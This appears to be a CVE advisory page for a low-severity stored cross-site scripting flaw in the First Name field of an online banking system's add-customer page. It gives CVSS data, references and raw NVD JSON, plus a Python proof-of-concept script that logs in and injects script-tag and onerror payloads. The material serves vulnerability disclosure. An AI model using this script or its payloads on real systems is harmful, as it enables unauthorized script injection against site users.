CVE-2025-11333

Description

A vulnerability was identified in langleyfcu Online Banking System up to 57437e6400ce0ae240e692c24e6346b8d0c17d7a. This impacts an unknown function of the file /customer_add_action.php of the component Add Customer Page. The manipulation of the argument First Name leads to cross site scripting. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

langleyfcu Online Banking System (commit 57437e6400ce0ae240e692c24e6346b8d0c17d7a及之前版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11333 PoC - Stored XSS in langleyfcu Online Banking System # Vulnerability Location: /customer_add_action.php # Vulnerable Parameter: First Name import requests # Target configuration TARGET_URL = "http://target-bank-system.com" LOGIN_URL = f"{TARGET_URL}/login.php" ADD_CUSTOMER_URL = f"{TARGET_URL}/customer_add_action.php" # Attacker credentials (requires high privilege account) USERNAME = "admin" PASSWORD = "password123" # Malicious payload for XSS injection in First Name field XSS_PAYLOAD = '<script>alert("XSS");</script>' # Alternative payloads: # XSS_PAYLOAD = '<img src=x onerror=alert(document.cookie)>' # XSS_PAYLOAD = '<svg/onload=alert("XSS")>' def exploit_xss(): """ Exploit stored XSS vulnerability in customer_add_action.php by injecting malicious script through the First Name parameter. """ session = requests.Session() # Step 1: Login to obtain authenticated session login_data = { "username": USERNAME, "password": PASSWORD } session.post(LOGIN_URL, data=login_data) # Step 2: Inject malicious payload via First Name parameter customer_data = { "first_name": XSS_PAYLOAD, "last_name": "TestUser", "email": "[email protected]", "phone": "1234567890", "address": "Test Address" } response = session.post(ADD_CUSTOMER_URL, data=customer_data) if response.status_code == 200: print("[+] XSS payload injected successfully!") print(f"[+] Payload: {XSS_PAYLOAD}") print("[+] When any user views the customer list, the script will execute.") else: print(f"[-] Failed to inject payload. Status code: {response.status_code}") if __name__ == "__main__": exploit_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11333
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11333
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11333/
[4] VulDB https://vuldb.com/cve/CVE-2025-11333
[5] https://github.com/mhszed/Report/blob/main/online-banking-system-mastercustomer_home.php%20xss1.docx
[6] https://vuldb.com/?ctiid.327216
[7] https://vuldb.com/?id.327216
[8] https://vuldb.com/?submit.664562

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11333", "sourceIdentifier": "[email protected]", "published": "2025-10-06T11:15:33.230", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in langleyfcu Online Banking System up to 57437e6400ce0ae240e692c24e6346b8d0c17d7a. This impacts an unknown function of the file /customer_add_action.php of the component Add Customer Page. The manipulation of the argument First Name leads to cross site scripting. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/mhszed/Report/blob/main/online-banking-system-mastercustomer_home.php%20xss1.docx", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327216", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327216", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.664562", "source": "[email protected]"}]}}